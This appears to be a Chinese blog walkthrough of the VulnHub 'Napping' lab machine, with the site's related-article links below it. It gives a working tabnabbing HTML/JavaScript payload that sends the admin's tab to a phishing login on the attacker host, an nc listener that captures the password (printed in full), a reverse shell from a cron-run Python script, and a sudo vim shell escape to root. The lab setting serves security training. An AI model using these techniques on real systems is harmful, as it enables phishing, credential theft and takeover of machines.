4-vulnhub靶场,napping

最新推荐文章于 2024-04-30 20:41:06 发布
最新推荐文章于 2024-04-30 20:41:06 发布
阅读量374 收藏
点赞数
分类专栏: 靶机-每日练习记录 文章标签: 服务器 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49078152/article/details/126450357
版权

vulnhub-napping

nmap -sP 192.168.137.0/24

攻击机:192.168.137.129
靶机:192.168.137.131
在这里插入图片描述

nmap -sV -O 192.168.137.131

开放22端口,80端口
访问web界面
在这里插入图片描述
一个登录页面。
注册一个账号
登入的场景
在这里插入图片描述
检查一下页面发现存在tabnabbing漏洞
下载界面,使其变成钓鱼链接index.html
在这里插入图片描述
再新建一个恶意链接come.html

<!DOCTYPE html>
<html>
<body>
    <script>
    	if(window.opener) window.opener.parent.location.replace('http://192.168.137.129:8000/index.html');
    	if(window.opener  != window) window.opener.parent.location.replace('http://192.168.137.129:8000/index.html');
    </script>
</body>
</html>

这个代码的意思就是打开这个链接的父界面将跳到’http://192.168.137.129:8000/index.html’
在这里插入图片描述
任意方法搭建http服务

systemctl start mysql
service apache2 start
监听8000端口:
nc -lvp 8000

在这里插入图片描述
得到账号和密码。
现在说一下这么做为什么可以获取数据:
'All links will be reviewed by our admin’这句话说明了管理员会点击我们传输的链接,
可以理解为:点击了我们的come.html链接后会跳转到index.html(登录界面)他以为要重新登录,所以就输入账号和密码,其实这是我们的一个网站,所以我们监听就可以接到这个报文获得信息。这里靶机貌似就是模拟有跳转就会发送报文,所以index.html是什么页面都成功的。
获取账号密码尝试登录ssh:
username=daniel&password=C%40ughtm3napping123
这里因为是post传输的所以有url编码,%40是@
账号:daniel
密码:C@ughtm3napping123

shh daniel@192.168.137.129

在这里插入图片描述
登录成功
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现daniel只是一个普通组的成员
用find命令查找admin组可以执行的程序(且daniel有权限的文件)

find / -group administrators -type f 2>/dev/null

2>/dev/null的利用
在这里插入图片描述
打开本地文件,打不开就报错,查看一下报错记录:

cat /home/adrian/site_status.txt

在这里插入图片描述
这个记录就说明它至多2分钟会执行一次这个py文件
创建sh文件
在这里插入图片描述
编辑query.py文件
在这里插入图片描述
监听9000端口即可
sudo -l 查看一下命令权限
在这里插入图片描述
Vim提权
输入:

sudo /usr/bin/vim -c ':!/bin/sh'\

在这里插入图片描述
成功

液冷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
关于Mybatis使用原生接口开发的心得以及示例代码.docx
06-28
刚刚做完mybatis原生接口的开发模式,怎么说呐,整个人心态崩掉,这东西可以说是麻烦透顶了......基本全都是配置,而且和JDBC比起来甚至让我感觉没啥优化了的地方(难道优化的就是那寥寥几个异常的捕捉?这就很离谱) 没啥好说的,具体总结一下mybatis原生接口的开发模式: 因为mybatis为ORM映射框架所以: O: Object->实体类 R: RelationShip->数据表 M: Napping-O与R之间的映射
deep-perfumes-potion-app:使用自然语言处理对香水推荐引擎进行用户评论方面的培训
05-04
深香水药水应用 使用自然语言处理对香水推荐引擎进行用户评论方面的培训 在上尝试该应用 从basenotes.com(于04/2018撤消)收集了近6,000种香水,对140,000多条用户评论进行了培训。 使用gensim doc2vec在不同的香水和关键字(例如花香,香草等)之间找到关联。 -potionfinder.com上的模型训练和背景- 导入熊猫以查看报废的数据集,并导入gensim以部署doc2vec import pandas as pd import gensim df = pd . read_csv ( 'perfumedf_inproduction.csv' ) 数据集包含有关制造商,香水名称,等级,推出年份,性别和评论的信息。 对于此模型,我们将仅使用香水名称(doc标签)和评论(语料库)。 df . head () 可用性 性别 制作者 香水 评分 审
关于window.location.replace()以及history.go()方法
weixin_41304904的博客
07-03 7469
需求 当我们从商品列表界面点击商品进入商品编辑界面后,我们点击保存按钮,再跳转回商品列表界面。但此时会有一个问题,在商品列表界面返回上一界面,会返回到商品编辑界面。而我们希望它能返回到它真正的上一级,也就是我如果在主页点击该界面,编辑商品完成后,我应该返回主界面。 模拟 定义三个界面,home.html表示主界面,index.html表示商品列表界面,index1.html表示商品编辑界面,如下: <!DOCTYPE html> <html> <head> <
框架中框架子页面进行页面引导 window.location.replace的使用
Danny Chen的专栏
07-18 4218
window.parent.location.replace("login.jsp");   window.event.returnValue = false;
napping靶场渗透记录
找寻新世界还为时不晚,因为我的梦想是杨帆到日落之后的地方,尽管现今还无法实现, 但旧日的力量曾撼动天地。
10-04 453
napping靶场渗透记录 Even admins can fall asleep on the job
常用的javascript方法之刷新頁面的幾種方法(part6)
Super Livia
08-20 128
Javascript刷新頁面的幾種方法 1 history.go(0) 2 location.reload() 3 location=location 4 location.assign(location) 5 document.execCommand('Refresh') 6 window.navigate(location) 7 location.replace(location) 8 doc...
Vulnhub_Napping
qq_45434762的博客
02-13 3286
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
vulnhub靶场6:napping
Genarior的专栏
05-16 166
8、find / -group administrators -type f 2>/dev/null 查看有相同权限的文件 ,发现了一个query.py。6、启动python3 -m http.server 80 监听,同步nc -lvvp 8000端口监听,获得了账号密码。10、获得反弹shell,查看sudo可执行命令,可以无需密码root权限执行vim。使用sudo vim 修改/etc/passwd文件添加用户。13、使用sudo vim修改/etc/shadow文件。7、ssh登录,查看权限。
frameset中如何直接跳转至首页(中转页)--window.parent.parent.location.replace
Only the heart peace will be prosperity
10-13 365
  之间跳转页(中转页),turnToLogin.jsp &lt;%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%&gt; &lt;% String path = request.getContextPath(); String basePath = request.getScheme()+"://" ...
【react】使用iframe在react项目中嵌套vue项目,实现页面路由跳转。
m0_52743009的博客
10-09 1317
使用iframe在react项目中嵌套vue项目,实现页面路由跳转功能
NAPPING
10-24
NAPPING
napping-player:适用于 Android 平板电脑的视频播放器,可进行“小睡”实验
06-29
打盹儿 这是一款适用于 Android 平板电脑的视频播放器,可以进行“小睡”实验。 什么是午睡实验? 来自 Nestrud、Michael A. 和 Harry T.... “从 MFA 和 MDS 的小睡数据中恢复子采样维度和配置。...
小睡:Golang HTTP客户端库
02-20
Napping的灵感来自Python出色的库。状态系统状态特拉维斯CI CircleCI 工作服 Codecov 由使用并与它联合开发。安装要求Napping已。发展go get github.com/jmcvetta/napping稳定的小睡使用版本化。 当前版本是v3 。 ...
linux 磁盘管理
weixin_42795092的博客
04-29 1315
在mm下新建文件,在文件中输入内容,此内容就被写入第一个分区内,同时mm下会生出lost+found目录,当档案系统发生错误时, 将一些遗失的片段放置到这个目录下。把sdb3挂载到mm,创建文件同时写入内容,查看发现只显示f3,之前挂载的sdb1中的f1不见,代表多个分区可以挂载一个挂载点,但只显示最新挂载的分区。特点:针对不同的数据建立不同的分区,同时为不同的分区创建不同的权限。输入swapon /dev/sdb2,并查看虚拟内存组成分区,两块虚拟内存组成,虚拟内存挂载成功。
WinForms 应用程序中使用 SignalR 连接到服务器
一个专注于技术研究创新的程序员
04-29 492
假设您已经在服务器端实现了名为 SignalRHub 的 SignalR Hub,并且该 Hub 包含了一个名为 SendMessage 的方法,用于接收来自客户端的消息,并将其广播给所有连接的客户端。客户端在收到消息时调用名为 ReceiveMessage 的方法来处理。
服务器硬件:裸金属安装 VMware ESXi
山河已无恙
04-27 497
工作中遇到,简单整理博文内容涉及 裸金属安装VMware ESXi 基本步骤理解不足小伙伴帮忙指正不必太纠结于当下,也不必太忧虑未来,当你经历过一些事情的时候,眼前的风景已经和从前不一样了。——村上春树。
快速了解Linux IPC
最新发布
wJen的博客
04-30 1579
简单介绍了Linux IPC以便快速了解基本内容。
【方案解决思路】RPC服务器不可用
weixin_52364868的博客
04-27 644
如果RPC服务未运行或其启动类型未设置为自动,则需要检查远程客户端的注册表中的相关设置。当在SCCM服务器上使用wmic /node:<客户端IP> process list命令时,如果遇到“RPC服务器不可用”的错误,这通常意味着SCCM服务器无法通过RPC协议与远程客户端通信。: 在远程客户端上,检查本地安全策略设置,确保“网络访问:本地帐户的共享和安全模式”设置为“经典 - 本地用户以自己的身份验证”。:确保远程客户端上的WMI服务正在运行,并且具有正确的权限设置。
由于内部错误,服务器无法处理该请求。有关该错误的详细信息,请打开服务器上的 IncludeExceptionDetailInFaults
SJ15630070060的博客
04-30 441
由于内部错误,服务器无法处理该请求。有关该错误的详细信息,请打开服务器上的 IncludeExceptionDetailInFaults (从 ServiceBehaviorAttribute 或从 配置行为)以便将异常信息发送回客户端,或打开对每个 Microsoft .NET Framework SDK 文档的跟踪并检查服务器跟踪日志。
如何删除导入napping
05-26
如果您想删除已导入的Python模块`napping`,可以使用以下命令: ``` pip uninstall napping ``` 这将从Python环境中删除`napping`模块及其依赖项。请注意,您需要在命令行中执行此命令,并确保您具有足够的权限来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值